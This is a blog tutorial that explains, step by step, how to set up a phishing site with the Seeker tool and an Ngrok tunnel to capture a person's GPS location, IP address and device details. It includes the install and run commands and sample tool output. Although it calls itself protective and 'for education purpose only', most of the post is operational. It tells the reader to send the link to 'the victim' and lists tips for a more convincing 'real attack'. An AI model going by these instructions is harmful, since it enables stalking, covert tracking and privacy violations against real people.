Breaking News

Thursday 10 September 2020

How to find out exact location of the person

 How to find out exact location of the person


Find out the exact location of the person

This article will show how to use social engineering to find out the exact (home) location of the person. This will be important for those who want to protect themselves from such attacks - you will see what absolutely can not be done on unreliable sites and find out what information the person who sent you the link can get about you.


The described attack will work if the user opens the link from a mobile phone or Desktop and allow the site to use the user's location. Regardless of whether GPS is turned on, when a user opens a link, we get the following information:


  • operating system
  • Platform
  • The number of processor cores
  • RAM Capacity - Approximate Results
  • Screen resolution
  • GPU Information
  • Browser Name and Version
  • Public IP address

If permission to access the location is obtained, we can obtain
  • longitude
  • latitude
  • accuracy
  • altitude - not always available
  • direction - only available if the user is moving
  • speed - only available if the user is moving

The action algorithm is very simple:


1. We are launching a phishing site, which, under the pretext of, for example, searching for new friends nearby, asks for permission to determine the user's location.

2. We will send the user a link to our site.

3. If the user gives permission to the site to get his location, then we will find out to the nearest tens of meters where he is now.

4. Even if the user does not give permission, but clicks the link, we will find out his IP address, web browser model, and some other characteristics of his phone or computer.

Programs for finding the location


We will need two programs:

Seeker- launches a phishing site and analyzes the received data.


Ngork - in case you do not have a white IP address (or hosting); This program allows you to create links to your site so that the site on your local computer can be opened on the Internet. 

I will show an example of an attack from Kali LinuxIf you don't have Kali Linux then you can do this on Android by installing the Termux app in it but note your Android must be root in order to run these tools on Termux.

Installation steps for Seeker in Kali Linux

sudo apt-get update

sudo apt-get install python3 python3-pip php ssh git

pip3 install requests

git clone https://github.com/thewhiteh4t/seeker

cd seeker

python3 ./seeker.py -h

Installation steps for Ngrok in Kali Linux

wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip

unzip <folder name of Ngrok here>

Now go to the Ngrok website and complete signup procedure


After signup, you will see your auth token at the Ngrok website. Now give below command replace  <YOUR_AUTH_TOKEN> with your token.

./ngrok authtoken <YOUR_AUTH_TOKEN>

Running above command will add your auth token to your ngrok.yml file. Connecting an account will list your open tunnels in the dashboard, give you longer tunnel timeouts, and more

chmod +x ./ngrok

./ngrok -h

Seeker instruction for use

Everything is very simple, run seeker

python3 ./seeker.py -t manual


Here you will see two ready-made templates to choose from.

[+] Select a Template : 

[0] NearYou
[1] Google Drive
[2] WhatsApp

If I choose 0 the NearYou will be displayed

Then the information will be displayed.

[+] Loading NearYou Template...


[+] Port : 8080


[+] Starting PHP Server......[ Success ]



[+] Waiting for User Interaction.


It says that the PHP server has been successfully launched and expected user interaction.

Now, to create a tunnel from the Internet to our local server, in another window, run Ngrok :


Link http://16377e74.ngrok.io is generated. Now, this link must be sent to the victim. Suppose a user opens a link on the desktop.

In this case, he will see:



The page looks very good with beautiful animation. The inscriptions indicate that this service will allow you to find people near you and make new friends. Suppose the user clicks the continue button:


A location request will be generated.

In the seeker window, we will see the following:


The accurate location data received. For convenience, a link to Google maps also given. By clicking the link You will be redirected to Google Map. The map will display the accurate location of the person.

It is also said that the data is saved to a file along the path  ./seeker/db/results.csv  (relative to the folder with seeker files). This file stores all data, including from previous attacks.

Things to be improved to make the attack more professional.

Despite the full implementation and packaging into a convenient and simple program, these are more tools to demonstrate the working concept of an attack than a real attack.


When performing a real attack, you can make the following improvements:



1. Translate phishing site templates into the target user's language.



2. create your own templates.



3. use the link shortener. For example Bitly.



4. use a domain or subdomain suitable for the situation.


5. if you continue to use Ngrok, then at least move the templates to a subfolder so that the link contains the appropriate path for the situation.

6. improve the algorithm: if location data are not received, then write a recommendation to the user to open the link from the phone.

7. record all cases when the link was opened, even if the user did not click the button (you can even find out at least the user's IP address).

Note: If you don't have Kali Linux then you can perform this on Android also by installing the Termux app on Android. But also your Android must be rooted in order to perform this attack.

For education purpose only.

0 comments:

Post a Comment

'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })();
'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })();